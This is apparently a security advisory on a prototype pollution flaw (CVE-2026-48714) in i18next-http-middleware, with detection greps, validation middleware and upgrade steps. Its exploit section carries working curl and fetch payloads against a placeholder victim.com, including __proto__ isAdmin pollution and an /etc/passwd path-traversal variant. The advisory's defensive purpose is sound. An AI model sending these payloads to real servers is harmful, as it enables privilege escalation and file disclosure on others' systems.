i18next-http-middleware Prototype Pollution via missingKeyHandler (CVE-2026-48714) – Critical -DC-Jun2026-631


How CVE-2026-48714 Works

CVE-2026-48714 is a critical prototype pollution vulnerability in the `missingKeyHandler` of `i18next-http-middleware` versions prior to 3.9.7. `i18next-http-middleware` is a widely used i18next middleware for Node.js web frameworks such as Express and Fastify, and it also runs on Deno.
The vulnerability exists because `missingKeyHandler`, which receives missing translation keys from incoming HTTP requests, blocks the literal request-body keys `__proto__`, `constructor` and `prototype` (a fix introduced in version 3.9.3) but fails to reject dotted variants of these keys, such as `"__proto__.polluted"`.
When an application exposes `missingKeyHandler` to untrusted input and uses `i18next-fs-backend` ≤ 2.6.5, the downstream backend splits the missing-key string on the configured `keySeparator` (default `.`). The resulting segments are passed to an unguarded `setPath()` walker, which follows the `__proto__` segment and writes directly to `Object.prototype`. An attacker can send a POST request with a body such as `{"__proto__.polluted": "malicious"}` to pollute the global Object prototype.
This polluted prototype can then affect every plain object created subsequently in the Node.js process. The impact varies depending on the host application but can include crashes, corrupted translation behaviour, configuration poisoning, bypasses of property-based security checks, and even remote code execution (RCE) if chained with other vulnerabilities.
The vulnerability is exploitable remotely without authentication and has a CVSS v3 base score of 9.1 (Critical).
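To make the mechanism concrete, here is an added example (my own illustration, not code from the post or from i18next) of a dotted-key `setPath()`-style walker in its unguarded form beside a hardened one; the function names, the `demo()` driver and the sample store are assumptions.

```javascript
// Added illustration (not code from the post or from i18next): a minimal
// dotted-key setter like the setPath() walker described above, first
// unguarded, then hardened. Names and the sample key are constructed.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Unguarded walker: for "__proto__.polluted", obj['__proto__'] already exists
// (it is Object.prototype), so the walker descends into it and the final
// assignment lands on the prototype shared by every plain object.
function setPathUnguarded(obj, key, value, keySeparator = '.') {
  const segs = key.split(keySeparator);
  let cur = obj;
  for (let i = 0; i < segs.length - 1; i++) {
    if (cur[segs[i]] === undefined) cur[segs[i]] = {};
    cur = cur[segs[i]];
  }
  cur[segs[segs.length - 1]] = value;
}

// Hardened walker: reject any segment that could reach a prototype, and only
// descend into own, plain-object properties of the target.
function setPathGuarded(obj, key, value, keySeparator = '.') {
  const segs = key.split(keySeparator);
  if (segs.some((s) => FORBIDDEN_SEGMENTS.has(s))) {
    throw new Error(`refusing unsafe key segment in "${key}"`);
  }
  let cur = obj;
  for (let i = 0; i < segs.length - 1; i++) {
    const own = Object.prototype.hasOwnProperty.call(cur, segs[i]);
    if (!own || typeof cur[segs[i]] !== 'object' || cur[segs[i]] === null) {
      cur[segs[i]] = {};
    }
    cur = cur[segs[i]];
  }
  cur[segs[segs.length - 1]] = value;
}

// Runs both walkers against the dotted key from the advisory and reports what
// happened; the polluted property is removed again so the process stays clean.
function demo() {
  const store = {};
  setPathUnguarded(store, '__proto__.polluted', 'malicious');
  const leaked = {}.polluted; // an unrelated new object now carries the value
  delete Object.prototype.polluted;
  let rejected = false;
  try { setPathGuarded(store, '__proto__.polluted', 'malicious'); } catch { rejected = true; }
  setPathGuarded(store, 'common.greeting', 'hello'); // legitimate key still works
  return { leaked, rejected, stored: store.common.greeting, clean: {}.polluted === undefined };
}
```

Running `demo()` shows the unguarded walker leaking the value into a fresh `{}` while the guarded walker rejects the same key and still stores ordinary dotted keys.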

DailyCVE Form:

Platform: Node.js / Deno
Version: < 3.9.7
Vulnerability: Prototype Pollution
Severity: Critical (CVSS 9.1)
Date: 2026-06-15

Prediction: 2026-06-22

What Undercode Says:

Analytics & Detection

To determine if your application is vulnerable, check your `package.json` for the affected versions:

```shell
# Check i18next-http-middleware version
npm list i18next-http-middleware
# Check i18next-fs-backend version
npm list i18next-fs-backend
```

Exploitation Detection via Log Analysis

Monitor your application logs for suspicious `missingKeyHandler` requests containing prototype-polluting patterns. Note that these searches only find payloads if request bodies are written to the log you search; a plain access log that records only the request line will not contain them:

```shell
# Search for dotted prototype-pollution keys (e.g. "__proto__.polluted") in logged request bodies
grep -E '(__proto__|constructor|prototype)\.[a-zA-Z0-9_]+' /var/log/app/access.log
# Detect requests that nest an object under a "__proto__" key
grep -E '\{\s*"__proto__"\s*:\s*\{' /var/log/app/access.log
```

Runtime Detection Script

```javascript
// Add this detection middleware before your i18next handler
// (assumes `app` is an Express app with JSON body parsing already applied)
app.use((req, res, next) => {
  if (req.body && typeof req.body === 'object') {
    // Walk the body recursively; return true on the first key that could reach a prototype
    const hasUnsafeKey = (obj, path = '') => {
      for (const key of Object.keys(obj)) {
        const fullPath = path ? `${path}.${key}` : key;
        // Check for prototype-polluting patterns (catches "__proto__.x" as well as a nested "__proto__" object)
        if (key.includes('__proto__') || key.includes('constructor') || key.includes('prototype')) {
          console.warn(`Blocked prototype pollution attempt: ${fullPath}`);
          return true;
        }
        if (typeof obj[key] === 'object' && obj[key] !== null) {
          if (hasUnsafeKey(obj[key], fullPath)) return true;
        }
      }
      return false;
    };
    if (hasUnsafeKey(req.body)) {
      return res.status(400).json({ error: 'Invalid request payload' });
    }
  }
  next();
});
```

Exploit:

Proof of Concept (PoC)

An attacker can send a POST request to the endpoint that triggers `missingKeyHandler` (typically a route that handles missing translation keys, e.g., `/locales/add` or a similar save-missing endpoint).

```shell
# Exploit payload targeting __proto__.polluted
curl -X POST https://victim.com/locales/add \
  -H "Content-Type: application/json" \
  -d '{"__proto__.polluted": "malicious_value"}'
# Alternative payload using a nested object
curl -X POST https://victim.com/locales/add \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true, "polluted": "payload"}}'
# Path traversal variant (if using i18next-fs-backend)
curl -X POST https://victim.com/locales/add \
  -H "Content-Type: application/json" \
  -d '{"__proto__.config": "../../../etc/passwd"}'
```

Node.js Exploitation Script

```javascript
// Attacker-controlled payload
const payload = {
  "__proto__.isAdmin": true,
  "__proto__.debug": "enabled",
  "__proto__.redirect": "https://evil.com"
};
// Send via fetch
fetch('https://victim.com/api/missing-key', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify(payload)
});
```

After successful exploitation, any subsequent object creation in the Node.js process will inherit the polluted properties:

```javascript
// After pollution, this check passes for any user
if (user.isAdmin) { // true for all users!
  grantAdminAccess();
}
```

Protection:

1. Upgrade to Patched Versions (Recommended)

```shell
# Upgrade i18next-http-middleware to 3.9.7 or later
npm install i18next-http-middleware@3.9.7
# Upgrade i18next-fs-backend to 2.6.6 or later
npm install i18next-fs-backend@2.6.6
```

2. Input Validation Middleware

Add a request-body filter that rejects any top-level key containing `__proto__`, `constructor`, or `prototype` as a segment after splitting on your configured `keySeparator`:

```javascript
// Assumes `i18next` has already been initialised and `app` is an Express app
// with JSON body parsing applied before this middleware.
const keySeparator = i18next.options.keySeparator || '.';
// Reject a key if any segment (split on keySeparator) could reach a prototype
function hasUnsafeKeySegment(key) {
  const segments = key.split(keySeparator);
  return segments.some(seg =>
    seg === '__proto__' ||
    seg === 'constructor' ||
    seg === 'prototype'
  );
}
app.use((req, res, next) => {
  if (req.body && typeof req.body === 'object') {
    for (const key of Object.keys(req.body)) {
      if (hasUnsafeKeySegment(key)) {
        return res.status(400).json({ error: 'Invalid key detected' });
      }
    }
  }
  next();
});
```

3. Disable Missing-Key Persistence

If you cannot upgrade immediately, disable missing-key persistence when accepting writes from untrusted input:

```javascript
i18next.init({
  saveMissing: false, // Disable saving missing keys
  // ... other options
});
```

4. Restrict Access

Do not expose `missingKeyHandler` to untrusted users. Mount it behind authentication or remove the route entirely.

5. WAF Rule

Add a Web Application Firewall (WAF) rule to reject requests containing __proto__, constructor, or `prototype` in request bodies or query parameters.

Impact:

  • Prototype Pollution – A single unauthenticated request can pollute Object.prototype, affecting every plain object created subsequently in the Node.js process.
  • Authorization Bypass – Polluted properties like `isAdmin` can break authorization checks, allowing privilege escalation.
  • Denial of Service (DoS) – Type confusion from polluted objects can cause application crashes. Additionally, unbounded growth of `i18next.options.ns` can lead to memory and CPU exhaustion.
  • Remote Code Execution (RCE) – Depending on downstream code that reads from polluted objects, this vulnerability can be chained into RCE.
  • Path Traversal / SSRF – When paired with filesystem or HTTP backends, attacker-controlled `lng` and `ns` values can enable path traversal (e.g., ../../etc/passwd) or Server-Side Request Forgery (SSRF).
  • Configuration Poisoning – Polluted prototype properties can alter application configuration, leading to unpredictable behaviour.

Sources:

Reported By: github.com